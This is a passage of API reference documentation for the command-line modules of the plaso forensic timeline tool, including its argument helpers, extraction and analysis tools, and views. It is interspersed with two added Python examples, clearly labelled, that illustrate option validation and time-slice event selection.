            BadConfigObject – when the configuration object is of the wrong type.

plaso.cli.helpers.viper_analysis module

The Viper analysis plugin CLI arguments helper.

class plaso.cli.helpers.viper_analysis.ViperAnalysisArgumentsHelper
    Bases: plaso.cli.helpers.interface.ArgumentsHelper

    Viper analysis plugin CLI arguments helper.

    classmethod AddArguments(argument_group)
        Adds command line arguments the helper supports to an argument group.

        This function takes an argument parser or an argument group object and adds to it all the command line arguments this helper supports.

        Parameters
            argument_group (argparse._ArgumentGroup|argparse.ArgumentParser) – argparse group.

    CATEGORY = 'analysis'

    DESCRIPTION = 'Argument helper for the Viper analysis plugin.'

    NAME = 'viper'

    classmethod ParseOptions(options, analysis_plugin)
        Parses and validates options.

        Parameters
            • options (argparse.Namespace) – parser options.
            • analysis_plugin (ViperAnalysisPlugin) – analysis plugin to configure.

        Raises
            • BadConfigObject – when the analysis plugin object is of the wrong type.
            • BadConfigOption – when unable to connect to the Viper instance.

plaso.cli.helpers.virustotal_analysis module

The VirusTotal analysis plugin CLI arguments helper.

class plaso.cli.helpers.virustotal_analysis.VirusTotalAnalysisArgumentsHelper
    Bases: plaso.cli.helpers.interface.ArgumentsHelper

    VirusTotal analysis plugin CLI arguments helper.

    classmethod AddArguments(argument_group)
        Adds command line arguments the helper supports to an argument group.

        This function takes an argument parser or an argument group object and adds to it all the command line arguments this helper supports.

        Parameters
            argument_group (argparse._ArgumentGroup|argparse.ArgumentParser) – argparse group.

    CATEGORY = 'analysis'

    DESCRIPTION = 'Argument helper for the VirusTotal analysis plugin.'

    NAME = 'virustotal'

    classmethod ParseOptions(options, analysis_plugin)
        Parses and validates options.

        Parameters
            • options (argparse.Namespace) – parser options.
            • analysis_plugin (VirusTotalAnalysisPlugin) – analysis plugin to configure.

        Raises
            • BadConfigObject – when the analysis plugin object is of the wrong type.
            • BadConfigOption – when a configuration parameter fails validation or when unable to connect to VirusTotal.

plaso.cli.helpers.windows_services_analysis module

The Windows Services analysis plugin CLI arguments helper.

class plaso.cli.helpers.windows_services_analysis.WindowsServicesAnalysisArgumentsHelper
    Bases: plaso.cli.helpers.interface.ArgumentsHelper

    Windows Services analysis plugin CLI arguments helper.

    classmethod AddArguments(argument_group)
        Adds command line arguments the helper supports to an argument group.

        This function takes an argument parser or an argument group object and adds to it all the command line arguments this helper supports.

        Parameters
            argument_group (argparse._ArgumentGroup|argparse.ArgumentParser) – argparse group.

    CATEGORY = 'analysis'

    DESCRIPTION = 'Argument helper for the Windows Services analysis plugin.'

    NAME = 'windows_services'

    classmethod ParseOptions(options, analysis_plugin)
        Parses and validates options.

        Parameters
            • options (argparse.Namespace) – parser options.
            • analysis_plugin (WindowsServicePlugin) – analysis plugin to configure.

        Raises
            BadConfigObject – when the analysis plugin object is of the wrong type.

plaso.cli.helpers.workers module

The worker processes CLI arguments helper.

class plaso.cli.helpers.workers.WorkersArgumentsHelper
    Bases: plaso.cli.helpers.interface.ArgumentsHelper

    Worker processes CLI arguments helper.

    classmethod AddArguments(argument_group)
        Adds command line arguments to an argument group.

        This function takes an argument parser or an argument group object and adds to it all the command line arguments this helper supports.

        Parameters: argument_group (argparse._ArgumentGroup|argparse.ArgumentParser) – argparse group.

    DESCRIPTION = 'Worker processes command line arguments.'
    NAME = 'workers'

    classmethod ParseOptions(options, configuration_object)
        Parses and validates options.

        Parameters:
            • options (argparse.Namespace) – parser options.
            • configuration_object (CLITool) – object to be configured by the argument helper.

        Raises:
            • BadConfigObject – when the configuration object is of the wrong type.
            • BadConfigOption – when a configuration parameter fails validation.

plaso.cli.helpers.xlsx_output module

The XLSX output module CLI arguments helper.

class plaso.cli.helpers.xlsx_output.XLSXOutputArgumentsHelper
    Bases: plaso.cli.helpers.interface.ArgumentsHelper

    XLSX output module CLI arguments helper.

    classmethod AddArguments(argument_group)
        Adds command line arguments the helper supports to an argument group.

        This function takes an argument parser or an argument group object and adds to it all the command line arguments this helper supports.

        Parameters: argument_group (argparse._ArgumentGroup|argparse.ArgumentParser) – argparse group.

    CATEGORY = 'output'
    DESCRIPTION = 'Argument helper for the XLSX output module.'
    NAME = 'xlsx'

    classmethod ParseOptions(options, output_module)
        Parses and validates options.

        Parameters:
            • options (argparse.Namespace) – parser options.
            • output_module (XLSXOutputModule) – output module to configure.

        Raises:
            • BadConfigObject – when the output module object is of the wrong type.
            • BadConfigOption – when the output filename was not provided.

plaso.cli.helpers.yara_rules module

The YARA rules CLI arguments helper.

class plaso.cli.helpers.yara_rules.YaraRulesArgumentsHelper
    Bases: plaso.cli.helpers.interface.ArgumentsHelper

    YARA rules CLI arguments helper.

    classmethod AddArguments(argument_group)
        Adds command line arguments to an argument group.

        This function takes an argument parser or an argument group object and adds to it all the command line arguments this helper supports.

        Parameters: argument_group (argparse._ArgumentGroup|argparse.ArgumentParser) – argparse group.

    DESCRIPTION = 'YARA rules command line arguments.'
    NAME = 'yara_rules'

    classmethod ParseOptions(options, configuration_object)
        Parses and validates options.

        Parameters:
            • options (argparse.Namespace) – parser options.
            • configuration_object (CLITool) – object to be configured by the argument helper.

        Raises:
            • BadConfigObject – when the configuration object is of the wrong type.
            • BadConfigOption – when the Yara rules file cannot be read or parsed.
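The helpers above all follow one contract: AddArguments() registers options on an argparse parser or argument group, and ParseOptions() validates the parsed values, raising BadConfigObject when it is handed the wrong kind of object and BadConfigOption when a value fails validation. The block below is an added example, not code from plaso: it re-implements that contract locally so it runs without plaso installed (the two exception classes, the VolumeConfiguration stand-in for the tool object, and the --volumes option are assumptions made here), and the value it validates uses the volume identifier syntax ("1,3,5", "3..5", "1,3..5" or "all") that the storage media tool mediator documents for ParseVolumeIdentifiersString later in this chapter.

```python
"""Added example, not plaso's own code: the arguments-helper contract described
above, re-implemented locally. BadConfigObject, BadConfigOption, the
VolumeConfiguration stand-in and the --volumes option are assumptions."""
import argparse


class BadConfigObject(Exception):
  """The object handed to ParseOptions() has the wrong type (assumed name)."""


class BadConfigOption(Exception):
  """A command line option failed validation (assumed name)."""


class VolumeConfiguration(object):
  """Hypothetical object the helper configures; stands in for CLITool."""

  def __init__(self):
    self.volume_identifiers = None


def ParseVolumeIdentifiersString(volume_identifiers_string, prefix='v'):
  """Parses "1,3,5", "3..5", "1,3..5" or "all" into prefixed identifiers.

  The first volume is 1; duplicates are merged and the result sorted (this
  example's choice). Raises ValueError for an empty string, a token that is
  not a number >= 1, or a descending range.
  """
  string = volume_identifiers_string.strip()
  if string == 'all':
    return 'all'
  if not string:
    raise ValueError('empty volume identifiers string')

  volume_numbers = set()
  for token in string.split(','):
    token = token.strip()
    first, separator, last = token.partition('..')
    if not separator:
      last = first  # A single number is the range first..first.
    if not (first.isdigit() and last.isdigit()):
      raise ValueError('invalid volume identifier: {0:s}'.format(token))
    first_number, last_number = int(first), int(last)
    if first_number < 1 or last_number < first_number:
      raise ValueError('invalid volume range: {0:s}'.format(token))
    volume_numbers.update(range(first_number, last_number + 1))

  return ['{0:s}{1:d}'.format(prefix, number) for number in sorted(volume_numbers)]


class VolumesArgumentsHelper(object):
  """Arguments helper that adds and validates a --volumes option."""

  NAME = 'volumes'
  DESCRIPTION = 'Volume selection command line arguments.'

  @classmethod
  def AddArguments(cls, argument_group):
    """Adds the option to an argparse parser or argument group."""
    argument_group.add_argument(
        '--volumes', dest='volumes', action='store', type=str, default=None,
        help='Volumes to process: "1,3", "3..5", "1,3..5" or "all".')

  @classmethod
  def ParseOptions(cls, options, configuration_object):
    """Validates the parsed options and configures configuration_object.

    Raises BadConfigObject if configuration_object is not a
    VolumeConfiguration and BadConfigOption if --volumes does not parse.
    """
    if not isinstance(configuration_object, VolumeConfiguration):
      raise BadConfigObject('configuration object is not a VolumeConfiguration')

    volumes = getattr(options, 'volumes', None)
    if volumes is None:
      return  # Option not given: leave the configuration untouched.
    try:
      configuration_object.volume_identifiers = ParseVolumeIdentifiersString(volumes)
    except ValueError as exception:
      raise BadConfigOption('unsupported --volumes value: {0!s}'.format(exception))


def ConfigureFromArguments(arguments):
  """Runs the helper end to end and returns the parsed volume identifiers."""
  parser = argparse.ArgumentParser(description=VolumesArgumentsHelper.DESCRIPTION)
  VolumesArgumentsHelper.AddArguments(parser.add_argument_group(VolumesArgumentsHelper.NAME))
  configuration = VolumeConfiguration()
  VolumesArgumentsHelper.ParseOptions(parser.parse_args(arguments), configuration)
  return configuration.volume_identifiers


if __name__ == '__main__':
  print(ConfigureFromArguments(['--volumes', '1,3..5']))
```

Keeping validation in ParseOptions() rather than in an argparse type callback is what lets a tool report every configuration problem through one exception type, and the isinstance check is the part that corresponds to the BadConfigObject error listed for each helper above.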

Module contents

This file imports Python modules that register CLI helpers.

Submodules

plaso.cli.analysis_tool module

Shared functionality for an analysis CLI tool.

class plaso.cli.analysis_tool.AnalysisTool(input_reader=None, output_writer=None)
    Bases: plaso.cli.tools.CLITool, plaso.cli.tool_options.AnalysisPluginOptions, plaso.cli.tool_options.ProfilingOptions, plaso.cli.tool_options.StorageFileOptions

    Analysis CLI tool.

    list_analysis_plugins
        True if information about the analysis plugins should be shown.
        Type: bool

plaso.cli.extraction_tool module

Shared functionality for an extraction CLI tool.

class plaso.cli.extraction_tool.ExtractionTool(input_reader=None, output_writer=None)
    Bases: plaso.cli.storage_media_tool.StorageMediaTool, plaso.cli.tool_options.HashersOptions, plaso.cli.tool_options.ProfilingOptions, plaso.cli.tool_options.StorageFileOptions

    Extraction CLI tool.

    list_time_zones
        True if the time zones should be listed.
        Type: bool

    AddPerformanceOptions(argument_group)
        Adds the performance options to the argument group.
        Parameters: argument_group (argparse._ArgumentGroup) – argparse argument group.

    AddProcessingOptions(argument_group)
        Adds the processing options to the argument group.
        Parameters: argument_group (argparse._ArgumentGroup) – argparse argument group.

    AddTimeZoneOption(argument_group)
        Adds the time zone option to the argument group.
        Parameters: argument_group (argparse._ArgumentGroup) – argparse argument group.

    ExtractEventsFromSources()
        Processes the sources and extracts events.
        Raises:
            • BadConfigOption – if the storage file path is invalid, the storage format is not supported, or writing to the storage failed.
            • IOError – if the extraction engine could not write to the storage.
            • OSError – if the extraction engine could not write to the storage.
            • SourceScannerError – if the source scanner could not find a supported file system.
            • UserAbort – if the user initiated an abort.

    ListParsersAndPlugins()
        Lists information about the available parsers and plugins.

plaso.cli.image_export_tool module

The image export CLI tool.

class plaso.cli.image_export_tool.ImageExportTool(input_reader=None, output_writer=None)
    Bases: plaso.cli.storage_media_tool.StorageMediaTool

    Class that implements the image export CLI tool.

    has_filters
        True if filters have been specified via the options.
        Type: bool

    list_signature_identifiers
        True if information about the signature identifiers should be shown.
        Type: bool

    AddFilterOptions(argument_group)
        Adds the filter options to the argument group.
        Parameters: argument_group (argparse._ArgumentGroup) – argparse argument group.

    DESCRIPTION = 'This is a simple collector designed to export files inside an image, both within a regular RAW image as well as inside a VSS. The tool uses a collection filter that uses the same syntax as a targeted plaso filter.'
    EPILOG = 'And that is how you export files, plaso style.'

    ListSignatureIdentifiers()
        Lists the signature identifiers.
        Raises: BadConfigOption – if the data location is invalid.

    NAME = 'image_export'

    ParseArguments(arguments)
        Parses the command line arguments.
        Parameters: arguments (list[str]) – command line arguments.
        Returns: True if the arguments were successfully parsed.
        Return type: bool

    ParseOptions(options)
        Parses the options and initializes the front-end.
        Parameters: options (argparse.Namespace) – command line arguments.
        Raises: BadConfigOption – if the options are invalid.

    PrintFilterCollection()
        Prints the filter collection.

    ProcessSources()
        Processes the sources.
        Raises:
            • SourceScannerError – if the source scanner could not find a supported file system.
            • UserAbort – if the user initiated an abort.

plaso.cli.log2timeline_tool module

The log2timeline CLI tool.

class plaso.cli.log2timeline_tool.Log2TimelineTool(input_reader=None, output_writer=None)
    Bases: plaso.cli.extraction_tool.ExtractionTool

    Log2timeline CLI tool.

    dependencies_check
        True if the availability and versions of dependencies should be checked.
        Type: bool

    list_hashers
        True if the hashers should be listed.
        Type: bool

    list_parsers_and_plugins
        True if the parsers and plugins should be listed.
        Type: bool

    list_profilers
        True if the profilers should be listed.
        Type: bool

    show_info
        True if information about hashers, parsers, plugins, etc. should be shown.
        Type: bool

    AddLegacyStorageOptions(argument_parser)
        Adds the legacy storage options to the argument parser.
        Parameters: argument_parser (argparse.ArgumentParser) – argparse argument parser.

    AddStorageOptions(argument_group)
        Adds the storage options to the argument group.
        Parameters: argument_group (argparse._ArgumentGroup) – argparse argument group.

    DESCRIPTION = '\nlog2timeline is a command line tool to extract events from individual \nfiles, recursing a directory (e.g. mount point) or storage media \nimage or device.\n\nMore information can be gathered from here:\n https://plaso.readthedocs.io/en/latest/sources/user/Using-log2timeline.html\n'
    EPILOG = '\nExample usage:\n\nRun the tool against a storage media image (full kitchen sink)\n log2timeline.py /cases/mycase/storage.plaso ímynd.dd\n\nInstead of answering questions, indicate some of the options on the\ncommand line (including data from particular VSS stores).\n log2timeline.py --vss_stores 1,2 /cases/plaso_vss.plaso image.E01\n\nAnd that is how you build a timeline using log2timeline...\n'
    NAME = 'log2timeline'

    ParseArguments(arguments)
        Parses the command line arguments.
        Parameters: arguments (list[str]) – command line arguments.
        Returns: True if the arguments were successfully parsed.
        Return type: bool

    ParseOptions(options)
        Parses the options.
        Parameters: options (argparse.Namespace) – command line arguments.
        Raises: BadConfigOption – if the options are invalid.

    ShowInfo()
        Shows information about available hashers, parsers, plugins, etc.

plaso.cli.logger module

The cli sub module logger.

plaso.cli.pinfo_tool module

The pinfo CLI tool.

class plaso.cli.pinfo_tool.PinfoTool(input_reader=None, output_writer=None)
    Bases: plaso.cli.tools.CLITool, plaso.cli.tool_options.StorageFileOptions

    Pinfo CLI tool.

    compare_storage_information
        True if the tool is used to compare stores.
        Type: bool

    generate_report
        True if a predefined report type should be generated.
        Type: bool

    list_reports
        True if the report types should be listed.
        Type: bool

    list_sections
        True if the section types should be listed.
        Type: bool

    CompareStores()
        Compares the contents of two stores.
        Returns: True if the content of the stores is identical.
        Return type: bool
        Raises: BadConfigOption – if the storage file format is not supported.

    DESCRIPTION = 'Shows information about a Plaso storage file, for example how it was collected, what information was extracted from a source, etc.'

    GenerateReport()
        Generates a report.
        Raises: BadConfigOption – if the storage file format is not supported.

    ListReports()
        Lists information about the available report types.

    ListSections()
        Lists information about the available sections.

    NAME = 'pinfo'

    ParseArguments(arguments)
        Parses the command line arguments.
        Parameters: arguments (list[str]) – command line arguments.
        Returns: True if the arguments were successfully parsed.
        Return type: bool

    ParseOptions(options)
        Parses the options.
        Parameters: options (argparse.Namespace) – command line arguments.
        Raises: BadConfigOption – if the options are invalid.

    PrintStorageInformation()
        Prints the storage information.
        Raises: BadConfigOption – if the storage file format is not supported.

plaso.cli.psort_tool module

The psort CLI tool.

class plaso.cli.psort_tool.PsortTool(input_reader=None, output_writer=None)
    Bases: plaso.cli.analysis_tool.AnalysisTool, plaso.cli.tool_options.OutputModuleOptions

    Psort CLI tool.

    list_analysis_plugins
        True if information about the analysis plugins should be shown.
        Type: bool

    list_language_identifiers
        True if information about the language identifiers should be shown.
        Type: bool

    list_output_modules
        True if information about the output modules should be shown.
        Type: bool

    list_profilers
        True if the profilers should be listed.
        Type: bool

    AddProcessingOptions(argument_group)
        Adds processing options to the argument group.
        Parameters: argument_group (argparse._ArgumentGroup) – argparse argument group.

    DESCRIPTION = 'Application to read, filter and process output from a plaso storage file.'
    NAME = 'psort'

    ParseArguments(arguments)
        Parses the command line arguments.
        Parameters: arguments (list[str]) – command line arguments.
        Returns: True if the arguments were successfully parsed.
        Return type: bool

    ParseOptions(options)
        Parses the options.
        Parameters: options (argparse.Namespace) – command line arguments.
        Raises: BadConfigOption – if the options are invalid.

    ProcessStorage()
        Processes a plaso storage file.
        Raises:
            • BadConfigOption – when a configuration parameter fails validation or the storage file cannot be opened with read access.
            • RuntimeError – if a non-recoverable situation is encountered.

plaso.cli.psteal_tool module

The psteal CLI tool.

class plaso.cli.psteal_tool.PstealTool(input_reader=None, output_writer=None)
    Bases: plaso.cli.extraction_tool.ExtractionTool, plaso.cli.tool_options.HashersOptions, plaso.cli.tool_options.OutputModuleOptions, plaso.cli.tool_options.StorageFileOptions

    Psteal CLI tool.

    Psteal extracts events from the provided source and stores them in an intermediate storage file. After extraction an output log file is created. This mimics the behavior of log2timeline.pl. The tool currently doesn’t support any of the log2timeline or psort tools’ flags.

    dependencies_check
        True if the availability and versions of dependencies should be checked.
        Type: bool

    list_hashers
        True if the hashers should be listed.
        Type: bool

    list_language_identifiers
        True if information about the language identifiers should be shown.
        Type: bool

    list_output_modules
        True if information about the output modules should be shown.
        Type: bool

    list_parsers_and_plugins
        True if the parsers and plugins should be listed.
        Type: bool

    AddStorageOptions(argument_group)
        Adds the storage options to the argument group.
        Parameters: argument_group (argparse._ArgumentGroup) – argparse argument group.

    AnalyzeEvents()
        Analyzes events from a plaso storage file and generates a report.
        Raises:
            • BadConfigOption – when a configuration parameter fails validation or the storage file cannot be opened with read access.
            • RuntimeError – if a non-recoverable situation is encountered.

    DESCRIPTION = '\npsteal is a command line tool to extract events from individual \nfiles, recursing a directory (e.g. mount point) or storage media \nimage or device. The output events will be stored in a storage file.\nThis tool will then read the output and process the events into a CSV \nfile.\n\nMore information can be gathered from here:\n https://plaso.readthedocs.io/en/latest/sources/user/Using-log2timeline.html\n'
    EPILOG = '\nExample usage:\n\nRun the tool against a storage media image (full kitchen sink)\n psteal.py --source ímynd.dd -w imynd.timeline.txt\n\nAnd that is how you build a timeline using psteal...\n'
    NAME = 'psteal'

    ParseArguments(arguments)
        Parses the command line arguments.
        Parameters: arguments (list[str]) – command line arguments.
        Returns: True if the arguments were successfully parsed.
        Return type: bool

    ParseOptions(options)
        Parses tool specific options.
        Parameters: options (argparse.Namespace) – command line arguments.
        Raises: BadConfigOption – if the options are invalid.

plaso.cli.status_view module

The status view.

class plaso.cli.status_view.StatusView(output_writer, tool_name)
    Bases: object

    Processing status view.

    GetAnalysisStatusUpdateCallback()
        Retrieves the analysis status update callback function.
        Returns: status update callback function or None if not available.
        Return type: function

    GetExtractionStatusUpdateCallback()
        Retrieves the extraction status update callback function.
        Returns: status update callback function or None if not available.
        Return type: function

    MODE_LINEAR = 'linear'
    MODE_WINDOW = 'window'

    PrintExtractionStatusHeader(processing_status)
        Prints the extraction status header.
        Parameters: processing_status (ProcessingStatus) – processing status.

    PrintExtractionSummary(processing_status)
        Prints a summary of the extraction.
        Parameters: processing_status (ProcessingStatus) – processing status.

    SetMode(mode)
        Sets the mode.
        Parameters: mode (str) – status view mode.

    SetSourceInformation(source_path, source_type, artifact_filters=None, filter_file=None)
        Sets the source information.
        Parameters:
            • source_path (str) – path of the source.
            • source_type (str) – source type.
            • artifact_filters (Optional[list[str]]) – names of artifact definitions to use as filters.
            • filter_file (Optional[str]) – filter file.

    SetStorageFileInformation(storage_file_path)
        Sets the storage file information.
        Parameters: storage_file_path (str) – path to the storage file.

plaso.cli.storage_media_tool module

The storage media CLI tool.

class plaso.cli.storage_media_tool.StorageMediaTool(input_reader=None, output_writer=None)
    Bases: plaso.cli.tools.CLITool

    CLI tool that supports a storage media device or image as input.

    AddCredentialOptions(argument_group)
        Adds the credential options to the argument group. The credential options are used to unlock encrypted volumes.
        Parameters: argument_group (argparse._ArgumentGroup) – argparse argument group.

    AddStorageMediaImageOptions(argument_group)
        Adds the storage media image options to the argument group.
        Parameters: argument_group (argparse._ArgumentGroup) – argparse argument group.

    AddVSSProcessingOptions(argument_group)
        Adds the VSS processing options to the argument group.
        Parameters: argument_group (argparse._ArgumentGroup) – argparse argument group.

    ScanSource(source_path)
        Scans the source path for volume and file systems.

        This function sets the internal source path specification and source type values.

        Parameters: source_path (str) – path to the source.
        Raises: SourceScannerError – if the format of or within the source is not supported.

class plaso.cli.storage_media_tool.StorageMediaToolMediator(*args: Any, **kwargs: Any)
    Bases: dfvfs.helpers.command_line.

    Mediator between the storage media tool and user input.

    ParseVolumeIdentifiersString(volume_identifiers_string, prefix='v')
        Parses a user specified volume identifiers string.
        Parameters:
            • volume_identifiers_string (str) – user specified volume identifiers. A range of volumes can be defined as: “3..5”. Multiple volumes can be defined as: “1,3,5” (a list of comma separated values). Ranges and lists can also be combined as: “1,3..5”. The first volume is 1. All volumes can be defined as: “all”.
            • prefix (Optional[str]) – volume identifier prefix.
        Returns: volume identifiers with prefix or the string “all”.
        Return type: list[str]
        Raises: ValueError – if the volume identifiers string is invalid.

    PromptUserForVSSCurrentVolume()
        Prompts the user if the current volume with VSS should be processed.
        Returns: True if the current volume with VSS should be processed.
        Return type: bool

class plaso.cli.storage_media_tool.StorageMediaToolVolumeScanner(*args: Any, **kwargs: Any)
    Bases: dfvfs.helpers.volume_scanner.

    Volume scanner used by the storage media tool.

    ScanSource(source_path, options, base_path_specs)
        Scans the source path for volume and file systems.

        This function sets the internal source path specification and source type values.

        Parameters:
            • source_path (str) – path to the source.
            • options (VolumeScannerOptions) – volume scanner options.
            • base_path_specs (list[PathSpec]) – file system base path specifications.
        Returns: source scanner context.
        Return type: dfvfs.SourceScannerContext
        Raises: dfvfs.ScannerError – if the format of or within the source is not supported.

    property source_type
        type of source.
        Type: str

class plaso.cli.storage_media_tool.StorageMediaToolVolumeScannerOptions(*args: Any, **kwargs: Any)
    Bases: dfvfs.helpers.volume_scanner.

    Volume scanner options used by the storage media tool.

    snapshots_only
        True if the current volume of a volume with snapshots should be ignored.
        Type: bool

plaso.cli.time_slices module

The time slice.

class plaso.cli.time_slices.TimeSlice(event_timestamp, duration=5)
    Bases: object

    Time slice.

    The time slice is used to provide a context of events around an event of interest.

    duration
        duration of the time slice in minutes.
        Type: int

    event_timestamp
        event timestamp of the time slice or None.
        Type: int

    property end_timestamp
        slice end timestamp or None.
        Type: int

    property start_timestamp
        slice start timestamp or None.
        Type: int
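As an added example that is not part of plaso, the block below re-implements the TimeSlice described above and applies it for the purpose its docstring gives it: selecting the events that fall within duration minutes on either side of an event of interest. Timestamps are integers in plaso's convention of microseconds since 1970-01-01 00:00:00 UTC; the inclusive boundaries, the ToTimestamp() and EventsInSlice() helpers and the sample events are this example's own choices, not plaso code.

```python
"""Added example, not plaso's own code: a minimal TimeSlice plus the
selection it exists for. Timestamps are microseconds since the Unix epoch
(plaso's convention); the helpers and sample events are constructed here."""
import datetime

MICROSECONDS_PER_MINUTE = 60 * 1000000


class TimeSlice(object):
  """Window of `duration` minutes on either side of event_timestamp."""

  def __init__(self, event_timestamp, duration=5):
    self.duration = duration  # int: duration of the slice in minutes.
    self.event_timestamp = event_timestamp  # int: microseconds, or None.

  @property
  def end_timestamp(self):
    """int: slice end timestamp, or None if no event timestamp is set."""
    if self.event_timestamp is None:
      return None
    return self.event_timestamp + self.duration * MICROSECONDS_PER_MINUTE

  @property
  def start_timestamp(self):
    """int: slice start timestamp, or None if no event timestamp is set."""
    if self.event_timestamp is None:
      return None
    return self.event_timestamp - self.duration * MICROSECONDS_PER_MINUTE


def ToTimestamp(iso_string):
  """Converts 'YYYY-MM-DDTHH:MM:SS' (UTC) to microseconds since the epoch."""
  date_time = datetime.datetime.strptime(iso_string, '%Y-%m-%dT%H:%M:%S')
  delta = date_time - datetime.datetime(1970, 1, 1)
  return (delta.days * 86400 + delta.seconds) * 1000000 + delta.microseconds


# Constructed sample events as (timestamp, message); not data from a real case.
# Deliberately unsorted, as events come out of a storage file in no fixed order.
SAMPLE_EVENTS = [
    (ToTimestamp('2021-06-06T09:52:00'), 'service installed'),
    (ToTimestamp('2021-06-06T10:05:01'), 'user logoff'),
    (ToTimestamp('2021-06-06T09:58:30'), 'scheduled task created'),
    (ToTimestamp('2021-06-06T10:04:59'), 'outbound connection'),
    (ToTimestamp('2021-06-06T10:00:00'), 'suspicious process start'),
    (ToTimestamp('2021-06-06T10:05:00'), 'file deleted'),
]


def EventsInSlice(events, time_slice):
  """Returns the messages of the events inside the slice, oldest first.

  Both boundaries are inclusive (this example's choice). A slice without an
  event timestamp selects nothing, so a caller cannot accidentally pull in
  every event in the store.
  """
  if time_slice.event_timestamp is None:
    return []
  selected = [
      (timestamp, message) for timestamp, message in events
      if time_slice.start_timestamp <= timestamp <= time_slice.end_timestamp]
  return [message for _, message in sorted(selected)]


if __name__ == '__main__':
  event_of_interest = ToTimestamp('2021-06-06T10:00:00')
  for message in EventsInSlice(SAMPLE_EVENTS, TimeSlice(event_of_interest)):
    print(message)
```

With the default five minute duration the slice around 10:00:00 runs from 09:55:00 to 10:05:00, so the 09:52:00 and 10:05:01 events fall outside it while the event at exactly 10:05:00 is kept.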

plaso.cli.tool_options module

The CLI tool options mix-ins.

class plaso.cli.tool_options.AnalysisPluginOptions
    Bases: object

    Analysis plugin options mix-in.

    ListAnalysisPlugins()
        Lists the analysis modules.

class plaso.cli.tool_options.HashersOptions
    Bases: object

    Hashers options mix-in.

    ListHashers()
        Lists information about the available hashers.

class plaso.cli.tool_options.OutputModuleOptions
    Bases: object

    Output module options mix-in.

    list_time_zones
        True if the time zones should be listed.
        Type: bool

    AddOutputOptions(argument_group)
        Adds the output options to the argument group.
        Parameters: argument_group (argparse._ArgumentGroup) – argparse argument group.

    ListLanguageIdentifiers()
        Lists the language identifiers.

    ListOutputModules()
        Lists the output modules.

class plaso.cli.tool_options.ProfilingOptions
    Bases: object

    Profiling options mix-in.

    ListProfilers()
        Lists information about the available profilers.

class plaso.cli.tool_options.StorageFileOptions
    Bases: object

    Storage file options mix-in.

    AddStorageOptions(argument_parser)
        Adds the storage options to the argument parser.
        Parameters: argument_parser (argparse.ArgumentParser) – argparse argument parser.

plaso.cli.tools module

The command line interface (CLI) tools classes.

class plaso.cli.tools.CLIInputReader(encoding='utf-8')
    Bases: object

    Command line interface input reader interface.

    abstract Read()
        Reads a string from the input.
        Returns: input.
        Return type: str

class plaso.cli.tools.CLIOutputWriter(encoding='utf-8')
    Bases: object

    Command line interface output writer interface.

    abstract Write(string)
        Writes a string to the output.
        Parameters: string (str) – output.

class plaso.cli.tools.CLITool(input_reader=None, output_writer=None)
    Bases: object

    Command line interface tool.

    preferred_encoding
        preferred encoding of single-byte or multi-byte character strings, sometimes referred to as extended ASCII.
        Type: str

    show_troubleshooting
        True if troubleshooting information should be shown.
        Type: bool

    AddBasicOptions(argument_group)
        Adds the basic options to the argument group.
        Parameters: argument_group (argparse._ArgumentGroup) – argparse argument group.

    AddInformationalOptions(argument_group)
        Adds the informational options to the argument group.
        Parameters: argument_group (argparse._ArgumentGroup) – argparse argument group.

    AddLogFileOptions(argument_group)
        Adds the log file option to the argument group.
        Parameters: argument_group (argparse._ArgumentGroup) – argparse argument group.

    CheckOutDated()
        Checks if the version of plaso is outdated and warns the user.

    GetCommandLineArguments()
        Retrieves the command line arguments.
        Returns: command line arguments.
        Return type: str

    GetVersionInformation()
        Retrieves the version information.
        Returns: version information.
        Return type: str

    ListTimeZones()
        Lists the timezones.

    NAME = ''

    ParseNumericOption(options, name, base=10, default_value=None)
        Parses a numeric option.

        If the option is not set the default value is returned.

        Parameters:
            • options (argparse.Namespace) – command line arguments.
            • name (str) – name of the numeric option.
            • base (Optional[int]) – base of the numeric value.
            • default_value (Optional[object]) – default value.
        Returns: numeric value.
        Return type: int
        Raises: BadConfigOption – if the options are invalid.

    ParseStringOption(options, argument_name, default_value=None)
        Parses a string command line argument.
        Parameters:
            • options (argparse.Namespace) – command line arguments.
            • argument_name (str) – name of the command line argument.
            • default_value (Optional[object]) – default value of the command line argument.
        Returns: command line argument value. If the command line argument is not set the default value will be returned.
        Return type: object
        Raises: BadConfigOption – if the command line argument value cannot be converted to a Unicode string.

    PrintSeparatorLine()
        Prints a separator line.

    property data_location
        path of the data files.
        Type: str

class plaso.cli.tools.FileObjectInputReader(file_object, encoding='utf-8')
    Bases: plaso.cli.tools.CLIInputReader

    File object command line interface input reader.

    This input reader relies on the file-like object having a readline method.

    Read()
        Reads a string from the input.
        Returns: input.
        Return type: str

class plaso.cli.tools.FileObjectOutputWriter(file_object, encoding='utf-8')
    Bases: plaso.cli.tools.CLIOutputWriter

    File object command line interface output writer.

    This output writer relies on the file-like object having a write method.

    Write(string)
        Writes a string to the output.
        Parameters: string (str) – output.

class plaso.cli.tools.StdinInputReader(encoding='utf-8')
    Bases: plaso.cli.tools.FileObjectInputReader

    Stdin command line interface input reader.

    Read()
        Reads a string from the input.
        Returns: input.
        Return type: str

class plaso.cli.tools.StdoutOutputWriter(encoding='utf-8')
    Bases: plaso.cli.tools.FileObjectOutputWriter

    Stdout command line interface output writer.

    Write(string)
        Writes a string to the output.
        Parameters: string (str) – output.

plaso.cli.views module

View classes.

class plaso.cli.views.BaseTableView(column_names=None, title=None, title_level=3)
    Bases: object

    Table view interface.

    AddRow(values)
        Adds a row of values.
        Parameters: values (list[object]) – values.
        Raises: ValueError – if the number of values is out of bounds.

    abstract Write(output_writer)
        Writes the table to the output writer.
        Parameters: output_writer (OutputWriter) – output writer.

class plaso.cli.views.CLITableView(column_names=None, title=None, title_level=3)
    Bases: plaso.cli.views.BaseTableView

    Command line table view.

    Note that currently this table view does not support more than 2 columns.

    AddRow(values)
        Adds a row of values.
        Parameters: values (list[object]) – values.
        Raises: ValueError – if the number of values is out of bounds.

    Write(output_writer)
        Writes the table to the output writer.
        Parameters: output_writer (OutputWriter) – output writer.
        Raises: RuntimeError – if the title exceeds the maximum width or if the table has more than 2 columns or if the column width is out of bounds.

class plaso.cli.views.CLITabularTableView(column_names=None, column_sizes=None, title=None)
    Bases: plaso.cli.views.BaseTableView

    Command line tabular table view interface.

    AddRow(values)
        Adds a row of values.
        Parameters: values (list[object]) – values.
        Raises: ValueError – if the number of values is out of bounds.

    Write(output_writer)
        Writes the table to the output writer.
        Parameters: output_writer (OutputWriter) – output writer.

class plaso.cli.views.MarkdownTableView(column_names=None, title=None, title_level=3)
    Bases: plaso.cli.views.BaseTableView

    Markdown table view.

    Write(output_writer)
